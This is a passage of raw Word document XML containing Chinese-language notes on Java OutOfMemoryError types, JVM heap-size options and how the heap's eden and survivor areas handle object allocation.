      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>增加</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虚拟机中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Xms</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（初始堆大小）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Xmx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（最大堆大小）参数的大小。如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set JAVA_OPTS= -Xms256m -Xmx1024m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(3)OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>unable to create new native thread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这种错误在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>线程个数很多的情况下容易发生</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRPr="00F41A4C" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(4)OutOfMemoryError: GC overhead limit exceeded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5F97" w:rsidRDefault="00AC5F97" w:rsidP="00AC5F97">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>新添的错误类型。是发生在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>占用大量时间而很少的堆被恢复的时候发生的，是一种保护机制。解决方案是，关闭该功能，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -XX:-UseGCOverheadLimit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00122671">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OOM</w:t>
      </w:r>
      <w:r w:rsidR="00852819">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3</w:t>
      </w:r>
      <w:r w:rsidR="00852819">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种</w:t>
      </w:r>
      <w:r w:rsidR="00852819">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>堆内存溢出（</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>outOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java heap space</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>规范中，堆中的内存是用来生成对象实例和数组的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果细分，堆内存还可以分为年轻代和年老代，年轻代包括一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区和两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当生成新对象时，内存的申请过程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          a</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>先尝试在</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区分配新建对象所需的内存；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          b</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、如果内存大小足够，申请结束，否则下一步；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00175DF4" w:rsidRPr="00175DF4" w:rsidRDefault="00175DF4" w:rsidP="00175DF4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          c</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>youngGC</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，试图将</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区中不活跃的对象释放掉，释放后若</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Eden</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>空间仍然不足以放入新对象，则试图将部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00175DF4">
        <w:rPr>
